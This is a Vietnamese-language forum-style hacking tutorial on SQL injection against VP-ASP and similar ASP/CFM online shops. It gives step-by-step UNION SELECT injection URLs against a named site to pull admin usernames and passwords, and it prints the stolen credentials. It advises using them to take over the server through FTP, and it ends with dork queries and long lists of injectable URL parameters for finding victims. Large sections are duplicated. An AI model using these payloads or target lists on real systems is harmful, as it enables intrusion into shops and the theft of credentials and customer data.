----> http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1 from tbluser"having 1=1--sp_password
-------------%--------------chú thích-------------%----------------
Nếu nó báo thế này hoặc tương tự )
Microsoft JET Database Engine error '80040e14' Syntax error in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like '9'%'union select 1 from tbluser"having 1=1--sp_password and hide=0 order by specialoffer desc,cname'. /shop$db.asp, line 912
Bạn thử thay id bằng cat , thay cat bằng id hoặc xoá dấu ' xem sao
-------------------------------------------------------------------------------------
Tiếp tục nhé
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1 from tbluser"having 1=1--sp_password
Khi nó báo thế này là được rồi
Microsoft JET Database Engine error '80040e14' The number of columns in the two selected tables or queries of a union query do not match. /shop$db.asp, line 912
Lỗi vừa rồi nói rằng : có tồn tại giá trị column chứa thông tin admin
bạn cứ tiếp tục thêm số vào nhé
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1,2 from tbluser"having 1=1--sp_password
nó vẫn báo như vậy
Microsoft JET Database Engine error '80040e14' The number of columns in the two selected tables or queries of a union query do not match. /shop$db.asp, line 912
ta cứ tiếp tục như vậy
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1,2,3 from tbluser"having 1=1--sp_password
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1,2,3,4 from tbluser"having 1=1--sp_password
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1,2,3,4,5 from tbluser"having 1=1--sp_password
.......................
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7 from tbluser"having 1=1--sp_password
Cho đến khi có 1 cái bảng đẹp đẹp như sau ( ở đây là số 37 )
3
click to see more422
18Please review these other products:
----------------------------Chú thích-----------------------------
Kinh nghiệm qua nhiều lần hack của tôi là bạn nên xem line để thêm số cho nhanh . Ví dụ như ở shop này line là 912 -------> /shop$db.asp, line 912 , với line là 912 thường thì bạn phải thêm đến 37 . Còn một số nữa :
line 467 -----> thêm đến47
line 468 ------> thêm 47
line 469 -------> thêm 48
còn lại bạn tự tìm hiểu nha.Nếu không nhớ line thì bạn cứ thử 1 trong các số thường gặp sau : 34 , 37 , 47 , 48 ,54 , 83 , 84 ,92 ......( Thông thường tôi chỉ thêm đến 84 là hết kiên nhẫn nổi ) nếu bạn kiên trì thì nên thêm từng số cho chắc ăn () . Tiếp nhé
-------------------------------------------------------------------------
Bây giờ chúng ta bắt đầu lấy user and pass:• fldusername : thay cho số 3 , hay 4, hay 22 tuỳ bạn• fldpassword : thay cho số 3 , hay 4, hay 22 tuỳ bạn ( fldusername và fldpassword là tên của 2 column trong tbluser ) ,Ở đây tôi lần lượt thay vào số 3 và số 4
Code
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1,2,fldusername,fldpassword,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37 from tbluser"having 1=1--sp_password
ok nó sẽ báo như vầy :
admin
click to see moreadmin32612 22
18Please review these other products:
-------------------------------
harvey
click to see moreboha216322
18Please review these other products:
ok shop này có 2 admin + admin pass : admin32612
+ harvey pass: boha2163
Trong trường hợp nó chỉ có thế này
3
click to see more
Please review these other products:
bạn chỉ có thể thay vào số 3 mà thôi vậy ta sẽ dùng câu lệnh như sau
union select 1,2, fldusername%2b'/'%2bfldpassword,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37 from tbluser"having 1=1--sp_password
cái này tôi không giải thích thêm , chắc bạn hiểu rồi > OK
http://www.treasureshidden.com/shopping/sh....asp?cat=9'
Việc còn lại là tìm link admin
ta cứ thử 2 link này xem
http://www.treasureshidden.com/shopping/shopadmin.asp
http://www.treasureshidden.com/shopping/shopadmin1.asp
Nếu link admin ko phải như vậy, thi bạn dùng câu lệnh sau :
union select 1,2,fieldvalue,,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37 from configuration"having 1=1--sp_password
fieldvalue và configuration là gì thì bạn hiểu rồi không nói nữa. Câu lệnh này sẽ cho ra rất nhiều kết quả
bạn cứ view hết từng trang (thường có 10 trang ) thu thập các link có đuôi .asp rồi thay vào thử xem có phải link admin ko
-------------<%>-------------<%>------------------------------------------
Ngoài ra tôi xin trích thêm bài của lão vietcuongconan ( tôi thường làm theo kiểu này )
shopdisplayproducts.asp?id=1'lỗi ok! chúng ta thường sài một câu truy vấn để lấy thông tin:
CODE%20union%20select%201%20from%20"table"%27
"union select 1 from "table"'
theo kinh nghiệm tôi rút ra được một điều. đó là chúng ta có thễ dựa vào số linemà đoán số column
CODE
line191 -- 56line184 -- 47,43,53line188 -- 53,56line191 -- 48line185 -- 86,43line202 -- 84,91line208 -- 48,57line64 -- 53line211,187 -- 43line59 -- 70........
sơ bộ vậy thôi.......( các pác cũng có thể xài tool wis and wed của dora để hack....nhưng mình thì kông sài tool để hack mời các bạn tiếp)
chúng ta phải thêm đúng số column thì mới lấy thông tin được......trong trường hợp chúng ta thêm số hoài mà không thấy cái bảng nào ra cả.....vậy phải làm sao đây.....
uh. vậy là nó đã fix!bó tay sao.......không
Cách 1:các bạn đang ở file shopdisplayproducts.aspbây giờ chuyển sang fileshoptellafriend.aspshopexd.asp.......ok!tiếp tụcvd:shoptellafriend.aspline cũa nó là: 184 --> sô 47tiếp tục hack
CODE
shoptellafriend.asp?id=1%20union%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 ,37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser %27
nó ra một cái bảncó số 3hehe!lấy user vào pass nào
CODE
shoptellafriend.asp?id=1%20union%20select%201,2,fl dusername%2b'/'% 2bfldpassword,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20t bluser%27
song xuôi, lấy link login nào.
CODEshoptellafriend.asp?id=1%20union%20select%201, 2,fi eldname%2b'/'% 2bfieldvalue,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,2
8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 45,46,47%20from%20configuration%27
oach! sao chả thấy gì hết vậy..........hixhix....khó rồi đây........bó tay sao.
bầy giờ chúng ta so sánh nhé.nếu ở file shopdisplayproducts.asp thì nó sẽ đưa ra kết quả cho chúng ta...ở ngay hàng đâu tiên thì bị bỏ trống.và thông tin xuất hiện ở hàng thứ 2vậy cái mà chúng ta vừa lấy được là cái hàng đầu tiên (hơi khó hiểu phải không)vậy chúng ta chỉ cần đưa cái link login về hàng 1 bằng cách thay số 1 bằng
CODEfieldname='xadminpage'
------>shoptellafriend.asp?id=1 union select fieldname='xadminpage',2,fieldname%2b'/'% 2bfieldvalue,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47 from configuration'
ở file shopexd.asp cũng như vậy....
----------------------<%>---------------<%>-----------------------
Một số kinh nghiệm về hack shop :
_ Khi lấy được user/pass của điều hành cần dùng nó để đăng nhập server với giao thức ftp nếu "may mắn" (<----lão hackerjp nói thế ()) bạn có thể làm chủ server và không cần phải phí công nhiều trong khi hack.
_ Có một số trường hợp, site bị lỗi Injectjon nhưng hiện trang báo lỗi (khi ta thêm dấu '): The page cannot bedisplayed, bạn cần chú ý phía bên dưới nó vẫn báo lỗi đấy._ Khi hack shop bạn nên xoay nó theo nhiều chiều : thay id bằng cat , để nguyên dấu ' hoặc xoá nó đi khi ta query.........
_Khi search shop bạn cần cố gắng tìm cách search sao cho thật hiệu quả , một số từ khoá khác mà bạn cũng nên thử : VP ASP shopping
shop products
intext:"vp-asp shopping" inurl :".asp?id="
intext:"products" inurl:".asp?id="
và còn nhiều nữa bạn tự tìm hiểu thêm.
_ Tut này chỉ giúp bạn hack được những shop 1 pass ( tuy là 1 pass nhưng còn hàng triệu shop như vậy ) (cố gắng mà search)
_ Với những shop 2 pass , thực sự nếu bạn hiểu rõ những gì tôi nói ở trên , thì việc hack pass 2 ko khó...chúc may mắn ()
Hack vui vẻ nha
http://www.treasureshidden.com/shopp...ucts.asp?cat=9
bạn thêm vào sau 1 dấu nháy đơn '
http://www.treasureshidden.com/shopping/sh....asp?cat=9'
ok báo lỗi rồi
9' Microsoft JET Database Engine error '80040e14' Syntax error in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like '9%' and hide=0 order by specialoffer desc,cname'. /shop$db.asp, line 912
Bạn chú ý chỗ này nhé -----------> Syntax error in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like '9%' and hide=0 order by specialoffer desc,cname'
Khi nó báo như vậy thì ta sẽ dùng union ( bạn giữ nguyên dấu ' nhé )
Câu lệnh như sau :
union select 1 from tbluser"having 1=1--sp_password
----> http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1 from tbluser"having 1=1--sp_password
-------------%--------------chú thích-------------%----------------
Nếu nó báo thế này hoặc tương tự )
Microsoft JET Database Engine error '80040e14' Syntax error in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like '9'%'union select 1 from tbluser"having 1=1--sp_password and hide=0 order by specialoffer desc,cname'. /shop$db.asp, line 912
Bạn thử thay id bằng cat , thay cat bằng id hoặc xoá dấu ' xem sao
-------------------------------------------------------------------------------------
Tiếp tục nhé
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1 from tbluser"having 1=1--sp_password
Khi nó báo thế này là được rồi
Microsoft JET Database Engine error '80040e14' The number of columns in the two selected tables or queries of a union query do not match. /shop$db.asp, line 912
Lỗi vừa rồi nói rằng : có tồn tại giá trị column chứa thông tin admin
bạn cứ tiếp tục thêm số vào nhé
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1,2 from tbluser"having 1=1--sp_password
nó vẫn báo như vậy
Microsoft JET Database Engine error '80040e14' The number of columns in the two selected tables or queries of a union query do not match. /shop$db.asp, line 912
ta cứ tiếp tục như vậy
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1,2,3 from tbluser"having 1=1--sp_password
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1,2,3,4 from tbluser"having 1=1--sp_password
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1,2,3,4,5 from tbluser"having 1=1--sp_password
.......................
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7 from tbluser"having 1=1--sp_password
Cho đến khi có 1 cái bảng đẹp đẹp như sau ( ở đây là số 37 )
3
click to see more422
18Please review these other products:
----------------------------Chú thích-----------------------------
Kinh nghiệm qua nhiều lần hack của tôi là bạn nên xem line để thêm số cho nhanh . Ví dụ như ở shop này line là 912 -------> /shop$db.asp, line 912 , với line là 912 thường thì bạn phải thêm đến 37 . Còn một số nữa :
line 467 -----> thêm đến47
line 468 ------> thêm 47
line 469 -------> thêm 48
còn lại bạn tự tìm hiểu nha.Nếu không nhớ line thì bạn cứ thử 1 trong các số thường gặp sau : 34 , 37 , 47 , 48 ,54 , 83 , 84 ,92 ......( Thông thường tôi chỉ thêm đến 84 là hết kiên nhẫn nổi ) nếu bạn kiên trì thì nên thêm từng số cho chắc ăn () . Tiếp nhé
-------------------------------------------------------------------------
Bây giờ chúng ta bắt đầu lấy user and pass:• fldusername : thay cho số 3 , hay 4, hay 22 tuỳ bạn• fldpassword : thay cho số 3 , hay 4, hay 22 tuỳ bạn ( fldusername và fldpassword là tên của 2 column trong tbluser ) ,Ở đây tôi lần lượt thay vào số 3 và số 4
Code
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1,2,fldusername,fldpassword,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37 from tbluser"having 1=1--sp_password
ok nó sẽ báo như vầy :
admin
click to see moreadmin32612 22
18Please review these other products:
-------------------------------
harvey
click to see moreboha216322
18Please review these other products:
ok shop này có 2 admin + admin pass : admin32612
+ harvey pass: boha2163
Trong trường hợp nó chỉ có thế này
3
click to see more
Please review these other products:
bạn chỉ có thể thay vào số 3 mà thôi vậy ta sẽ dùng câu lệnh như sau
union select 1,2, fldusername%2b'/'%2bfldpassword,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37 from tbluser"having 1=1--sp_password
cái này tôi không giải thích thêm , chắc bạn hiểu rồi > OK
http://www.treasureshidden.com/shopping/sh....asp?cat=9'
Việc còn lại là tìm link admin
ta cứ thử 2 link này xem
http://www.treasureshidden.com/shopping/shopadmin.asp
http://www.treasureshidden.com/shopping/shopadmin1.asp
Nếu link admin ko phải như vậy, thi bạn dùng câu lệnh sau :
union select 1,2,fieldvalue,,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37 from configuration"having 1=1--sp_password
fieldvalue và configuration là gì thì bạn hiểu rồi không nói nữa. Câu lệnh này sẽ cho ra rất nhiều kết quả
bạn cứ view hết từng trang (thường có 10 trang ) thu thập các link có đuôi .asp rồi thay vào thử xem có phải link admin ko
-------------<%>-------------<%>------------------------------------------
Ngoài ra tôi xin trích thêm bài của lão vietcuongconan ( tôi thường làm theo kiểu này )
shopdisplayproducts.asp?id=1'lỗi ok! chúng ta thường sài một câu truy vấn để lấy thông tin:
CODE%20union%20select%201%20from%20"table"%27
"union select 1 from "table"'
theo kinh nghiệm tôi rút ra được một điều. đó là chúng ta có thễ dựa vào số linemà đoán số column
CODE
line191 -- 56line184 -- 47,43,53line188 -- 53,56line191 -- 48line185 -- 86,43line202 -- 84,91line208 -- 48,57line64 -- 53line211,187 -- 43line59 -- 70........
sơ bộ vậy thôi.......( các pác cũng có thể xài tool wis and wed của dora để hack....nhưng mình thì kông sài tool để hack mời các bạn tiếp)
chúng ta phải thêm đúng số column thì mới lấy thông tin được......trong trường hợp chúng ta thêm số hoài mà không thấy cái bảng nào ra cả.....vậy phải làm sao đây.....
uh. vậy là nó đã fix!bó tay sao.......không
Cách 1:các bạn đang ở file shopdisplayproducts.aspbây giờ chuyển sang fileshoptellafriend.aspshopexd.asp.......ok!tiếp tụcvd:shoptellafriend.aspline cũa nó là: 184 --> sô 47tiếp tục hack
CODE
shoptellafriend.asp?id=1%20union%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 ,37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser %27
nó ra một cái bảncó số 3hehe!lấy user vào pass nào
CODE
shoptellafriend.asp?id=1%20union%20select%201,2,fl dusername%2b'/'% 2bfldpassword,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20t bluser%27
song xuôi, lấy link login nào.
CODEshoptellafriend.asp?id=1%20union%20select%201, 2,fi eldname%2b'/'% 2bfieldvalue,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,2
8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 45,46,47%20from%20configuration%27
oach! sao chả thấy gì hết vậy..........hixhix....khó rồi đây........bó tay sao.
bầy giờ chúng ta so sánh nhé.nếu ở file shopdisplayproducts.asp thì nó sẽ đưa ra kết quả cho chúng ta...ở ngay hàng đâu tiên thì bị bỏ trống.và thông tin xuất hiện ở hàng thứ 2vậy cái mà chúng ta vừa lấy được là cái hàng đầu tiên (hơi khó hiểu phải không)vậy chúng ta chỉ cần đưa cái link login về hàng 1 bằng cách thay số 1 bằng
CODEfieldname='xadminpage'
------>shoptellafriend.asp?id=1 union select fieldname='xadminpage',2,fieldname%2b'/'% 2bfieldvalue,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47 from configuration'
ở file shopexd.asp cũng như vậy....
----------------------<%>---------------<%>-----------------------
Một số kinh nghiệm về hack shop :
_ Khi lấy được user/pass của điều hành cần dùng nó để đăng nhập server với giao thức ftp nếu "may mắn" (<----lão hackerjp nói thế ()) bạn có thể làm chủ server và không cần phải phí công nhiều trong khi hack.
_ Có một số trường hợp, site bị lỗi Injectjon nhưng hiện trang báo lỗi (khi ta thêm dấu '): The page cannot bedisplayed, bạn cần chú ý phía bên dưới nó vẫn báo lỗi đấy._ Khi hack shop bạn nên xoay nó theo nhiều chiều : thay id bằng cat , để nguyên dấu ' hoặc xoá nó đi khi ta query.........
_Khi search shop bạn cần cố gắng tìm cách search sao cho thật hiệu quả , một số từ khoá khác mà bạn cũng nên thử : VP ASP shopping
shop products
intext:"vp-asp shopping" inurl :".asp?id="
intext:"products" inurl:".asp?id="
và còn nhiều nữa bạn tự tìm hiểu thêm.
_ Tut này chỉ giúp bạn hack được những shop 1 pass ( tuy là 1 pass nhưng còn hàng triệu shop như vậy ) (cố gắng mà search)
_ Với những shop 2 pass , thực sự nếu bạn hiểu rõ những gì tôi nói ở trên , thì việc hack pass 2 ko khó...chúc may mắn ()
Hack vui vẻ nha
Keys hack shop
KeyWorld hack shop CFM Part ( 8 )
.cfm?inc=1
.asp?contentID=1
.asp?logon=1
.asp?nid=1
orderinfo.asp?t=
cat_e.asp?N=1
.asp?ShopID=1good1
product.asp?sku=1
.asp?brandid=1
.asp?category=1
onlineCourse.asp?tID=
viewCategories.asp?idCategory=
.asp?idpage=
/shippinginfo.asp?lang=
.asp?Job_DID=
.asp?shopCode=1
product.asp?NODE_ID=
.asp?iPro=1
.asp?unacrocieramsc_id=
.asp?PND=1
,asp?c_ID=1
.asp?SValue=
.asp?tabid=
.cfm?shopping=1
DepartmentID=1
displayproducts=
.cfm?DomainID=
cityid=1
produktID=
traderid=1
shopperID=1
.cfm?passid=1
CatCode=1
.asp?scatid=1
CatName=1
CONTAINERID=
maincatid=
SKU_ID=1
subcatID=
.cfm?pagepkid=
manufacturersID=1
CFTOKEN=1
t.cfm?CFID=1
.cfm?Product_ID=1
.cfm?ProductCategory_ID=4
product_configuration_id=1
KeyWorld hack shop CFM Part ( 7 )
.asp?mscssid=1
l.asp?zone=
.asp?bei=1
.asp?redirectUrl=
.asp?catalog_name=
.cfm?xcode=1
.cfm?tlcatid=1
.asp?Post_ID=1
.asp?subcode=1
.asp?originID=
.asp?class_id=1
.asp?fScope=1
.asp?DriveID=1
.asp?AK=
.asp?XnID=
.asp?CpID=1
.asp?categ=
.asp?gen=
.asp?WebsiteID=
.asp?GroupID=1
asp?artistORD=
.asp?locationid=
.asp?idCategory=
.asp?TITEL=
.asp?FileID=
asp?IDLoja=
.asp?cadena=1
.cfm?pagina=
.cfm?palabras=
.cfm?id_ficha=
.cfm?pal_clave_rel=
.cfm?id_ficha=
.cfm?method=
asp?popsearch=
.cfm?indice=
.cfm?titulart_p=
asp?Lastname=
.asp?id_producto=1
.asp?Cadena=
.asp?comobo=
.cfm?categoryoid=1
.asp?ByBrand=1
.asp?newlang=
.asp?scat_code=1
l.asp?iPid=1
.asp?locationid=
.asp?StockID=4
.asp?idMainCategory=
t.asp?rand=
.asp?dept_id=1
.asp?t_date=1
.cfm?suppress_hdr=
.cfm?BRD=1
.cfm?top_id=
.cfm?datepub=
.cfm?site_id=
KeyWorld hack shop CFM Part ( 6 )
.asp?mygrp=1
.asp?ad_bn=1
.cfm?login_name=
.cfm?nPageNumber=
.cfm?videoid=1
asp?ProductCode=
/dvd.cfm?itemid=
asp?sorgid=
.asp?stato=
.asp?goods=
.cfm?info=
.asp?number
.cfm?cont=
.asp?Ph=
.cfm?PID2=
.cfm?c_id=
.cfm?recordid=
.cfm?modelid=1
.cfm?pt=
.cfm?sCurrencyCode=
catalog.cfm?a=1
productdetail.cfm?p=1
Buy_Laptop.cfm?pt=1
Computers.cfm?pt=1
displaycommon.cfm?an=1
.asp?nodeID=
.cfm?PlatformID=
.cfm?MemberID=
.cfm?adid=
lyordbank1
.cfm?JobID=111
cfm?deptid=
.cfm?EventID=
.cfm?cmkey=
.cfm?StID=
.cfm?showp=
.cfm?SubcategoryID=1
.cfm?ShopBy=
.cfm?subcategory_id=1
/index.cfm?stock=
.cfm?crit1=1
.cfm?starts_with=
.cfm?edit_id=
.cfm?categ_id=1
.cfm?icg_id=1
.asp?McatId=1
.cfm?Career_ID=
.cfm?community_id=
KeyWorld hack shop CFM Part ( 5 )
.cfm?module=
.cfm?mfr=
.asp?ManufPartNo=
.asp?symb=
.asp?navigationid=
.asp?itemno=
.asp?InvtId=
.asp?ProductCode=
.asp?InvtId=
asp?ModelNumber=1
.asp?TOPIC_ID=1
.cfm?SectionID=1
.asp?catcode=1
.cfm?menuid=
.asp?num=1
.asp?txtkey=1
.asp?CruiseID=1
.cfm?maincategory=1
.asp?dept=1
.cfm?dsp=1
.asp?storeurl=1
.asp?FCTopicID=
.cfm?id_infoalcohol=
.cfm?IDN=
.cfm?article_name=l
.cfm?mainpage=
.cfm?newsid=
.cfm?LevelID=
.cfm?linkedid=
.cfm?product_code=
cartaddto.cfm?item=
.cfm?articleid=
.cfm?subcategory=
/meetingShow.cfm?PubID=
/index.cfm?modelid=
.cfm?columnsName=
.cfm?event=
.cfm?itemno=
article.cfm?AID=
.cfm?CatDisplay=
home.cfm?r=
bookpage.asp?isbn=
KeyWorld hack shop CFM Part ( 4 )
.asp?catid=1
.asp?companyid=1
cfm?cod=1
.asp?PersonID=1
.asp?pln=1
.asp?brand=1
.asp?disp=1
asp?DealershipID=1
.cfm?method=1
.cfm?itemnum=1
.cfm?PartNumber=1
.cfm?tk=1
.cfm?ParentID=1
.asp?IK=1
.asp?PTYPE=1
.asp?PHNID=1
.asp?BRN=1
.cfm?uaction=1
.cfm?sid=
.cfm?cat=1
.cfm?PLow=
.cfm?CFID=1
.cfm?subc=
.cfm?i=1
.cfm?pq=1
.cfm?venueid=1
.cfm?owner=1
.cfm?bid=1
.cfm?StID=1
.cfm?DeptNo=1
.cfm?cat_id=1
.cfm?viewfrom=1
.cfm?indView=1
.cfm?categoryView=1
.cfm?gid=1
.cfm?detail=1
.cfm?subcategory=1
.cfm?destinationid=1
product.cfm?ProductID=1
cfm?categoryid=1
.cfm?TodoID=1
.cfm?cabinetID=1
trips.cfm?destinationid=1
KeyWorld hack shop CFM Part ( 3 )
.cfm?ArticleID=
.asp?mid=
.cfm?CFID=
.cfm?idzona=
.cfm?ZielErr=
index.cfm?smithgrind=
article.cfm?article=
book.cfm?&pid=
detail.cfm?rif=
/invoke.cfm?objectid=
/link.cfm?findcateg=
index.cfm?pagePkey=
/lista-aziende.cfm?idcat=
/cool.cfm?Selection=
Detail.cfm?said=
/corporate.cfm?IDNoteStampaFR=
/book.cfm?tab=
/viewcolumn.cfm?colid=
.asp/p=
.asp/f=
.cfm?indirizzo=
.cfm?provincia=
.asp?IdArt=
.cfm?afsrc=
.cfm?go=
.cfm?PID=
.asp?drug=
.asp?prid=
.cfm?an=
.cfm?nr=
.cfm?id2=
.cfm?rpid=1
.cfm?vid=1
.asp?st=
.asp?NID=
.asp?stateID=
.asp?DoAction=
.cfm?returnto=
.cfm?event=
.cfm?obj=
.cfm?pt=
.cfm?MerchantID=
.cfm?what=
lista-aziende.cfm?idcat=
/detail.cfm?IdNotizia=
.cfm?country=
index.cfm?id_rst=
detail.cfm?IdNotizia=
/index.cfm?release=
/infopop.cfm?classID=
leggi.cfm?art=
scheda.cfm?expID=
shop.cfm?artnr=
index.cfm?documentID=
/news_detail.cfm?newsID=
index.cfm?fuseaction=
/print-narrative.cfm?destID=
/index.cfm?sid=
/glossario.cfm?IDGlossario=
dyncat.cfm?catid=
theproducts.cfm?Owner=
theproducts.cfm?subcat=
imgindex.cfm?cat=
.cfm?Ne=1
.cfm?N=1
.cfm?ModelID=1
.cfm?viewall=1
.asp?Ntt=1`s
.cfm?Manufacturer=1
.cfm?vid=1
.cfm?fuseaction=1
.cfm?sub_site_id=1
.cfm?inc=1
.asp?contentID=1
.asp?logon=1
.asp?nid=1
orderinfo.asp?t=
cat_e.asp?N=1
.asp?ShopID=1good1
product.asp?sku=1
.asp?brandid=1
.asp?category=1
onlineCourse.asp?tID=
viewCategories.asp?idCategory=
.asp?idpage=
/shippinginfo.asp?lang=
.asp?Job_DID=
.asp?shopCode=1
product.asp?NODE_ID=
.asp?iPro=1
.asp?unacrocieramsc_id=
.asp?PND=1
,asp?c_ID=1
.asp?SValue=
.asp?tabid=
.cfm?shopping=1
DepartmentID=1
displayproducts=
.cfm?DomainID=
cityid=1
produktID=
traderid=1
shopperID=1
.cfm?passid=1
CatCode=1
.asp?scatid=1
CatName=1
CONTAINERID=
maincatid=
SKU_ID=1
subcatID=
.cfm?pagepkid=
manufacturersID=1
CFTOKEN=1
t.cfm?CFID=1
.cfm?Product_ID=1
.cfm?ProductCategory_ID=4
product_configuration_id=1
KeyWorld hack shop CFM Part ( 7 )
.asp?mscssid=1
l.asp?zone=
.asp?bei=1
.asp?redirectUrl=
.asp?catalog_name=
.cfm?xcode=1
.cfm?tlcatid=1
.asp?Post_ID=1
.asp?subcode=1
.asp?originID=
.asp?class_id=1
.asp?fScope=1
.asp?DriveID=1
.asp?AK=
.asp?XnID=
.asp?CpID=1
.asp?categ=
.asp?gen=
.asp?WebsiteID=
.asp?GroupID=1
asp?artistORD=
.asp?locationid=
.asp?idCategory=
.asp?TITEL=
.asp?FileID=
asp?IDLoja=
.asp?cadena=1
.cfm?pagina=
.cfm?palabras=
.cfm?id_ficha=
.cfm?pal_clave_rel=
.cfm?id_ficha=
.cfm?method=
asp?popsearch=
.cfm?indice=
.cfm?titulart_p=
asp?Lastname=
.asp?id_producto=1
.asp?Cadena=
.asp?comobo=
.cfm?categoryoid=1
.asp?ByBrand=1
.asp?newlang=
.asp?scat_code=1
l.asp?iPid=1
.asp?locationid=
.asp?StockID=4
.asp?idMainCategory=
t.asp?rand=
.asp?dept_id=1
.asp?t_date=1
.cfm?suppress_hdr=
.cfm?BRD=1
.cfm?top_id=
.cfm?datepub=
.cfm?site_id=
KeyWorld hack shop CFM Part ( 6 )
.asp?mygrp=1
.asp?ad_bn=1
.cfm?login_name=
.cfm?nPageNumber=
.cfm?videoid=1
asp?ProductCode=
/dvd.cfm?itemid=
asp?sorgid=
.asp?stato=
.asp?goods=
.cfm?info=
.asp?number
.cfm?cont=
.asp?Ph=
.cfm?PID2=
.cfm?c_id=
.cfm?recordid=
.cfm?modelid=1
.cfm?pt=
.cfm?sCurrencyCode=
catalog.cfm?a=1
productdetail.cfm?p=1
Buy_Laptop.cfm?pt=1
Computers.cfm?pt=1
displaycommon.cfm?an=1
.asp?nodeID=
.cfm?PlatformID=
.cfm?MemberID=
.cfm?adid=
lyordbank1
.cfm?JobID=111
cfm?deptid=
.cfm?EventID=
.cfm?cmkey=
.cfm?StID=
.cfm?showp=
.cfm?SubcategoryID=1
.cfm?ShopBy=
.cfm?subcategory_id=1
/index.cfm?stock=
.cfm?crit1=1
.cfm?starts_with=
.cfm?edit_id=
.cfm?categ_id=1
.cfm?icg_id=1
.asp?McatId=1
.cfm?Career_ID=
.cfm?community_id=
KeyWorld hack shop CFM Part ( 5 )
.cfm?module=
.cfm?mfr=
.asp?ManufPartNo=
.asp?symb=
.asp?navigationid=
.asp?itemno=
.asp?InvtId=
.asp?ProductCode=
.asp?InvtId=
asp?ModelNumber=1
.asp?TOPIC_ID=1
.cfm?SectionID=1
.asp?catcode=1
.cfm?menuid=
.asp?num=1
.asp?txtkey=1
.asp?CruiseID=1
.cfm?maincategory=1
.asp?dept=1
.cfm?dsp=1
.asp?storeurl=1
.asp?FCTopicID=
.cfm?id_infoalcohol=
.cfm?IDN=
.cfm?article_name=l
.cfm?mainpage=
.cfm?newsid=
.cfm?LevelID=
.cfm?linkedid=
.cfm?product_code=
cartaddto.cfm?item=
.cfm?articleid=
.cfm?subcategory=
/meetingShow.cfm?PubID=
/index.cfm?modelid=
.cfm?columnsName=
.cfm?event=
.cfm?itemno=
article.cfm?AID=
.cfm?CatDisplay=
home.cfm?r=
bookpage.asp?isbn=
KeyWorld hack shop CFM Part ( 4 )
.asp?catid=1
.asp?companyid=1
cfm?cod=1
.asp?PersonID=1
.asp?pln=1
.asp?brand=1
.asp?disp=1
asp?DealershipID=1
.cfm?method=1
.cfm?itemnum=1
.cfm?PartNumber=1
.cfm?tk=1
.cfm?ParentID=1
.asp?IK=1
.asp?PTYPE=1
.asp?PHNID=1
.asp?BRN=1
.cfm?uaction=1
.cfm?sid=
.cfm?cat=1
.cfm?PLow=
.cfm?CFID=1
.cfm?subc=
.cfm?i=1
.cfm?pq=1
.cfm?venueid=1
.cfm?owner=1
.cfm?bid=1
.cfm?StID=1
.cfm?DeptNo=1
.cfm?cat_id=1
.cfm?viewfrom=1
.cfm?indView=1
.cfm?categoryView=1
.cfm?gid=1
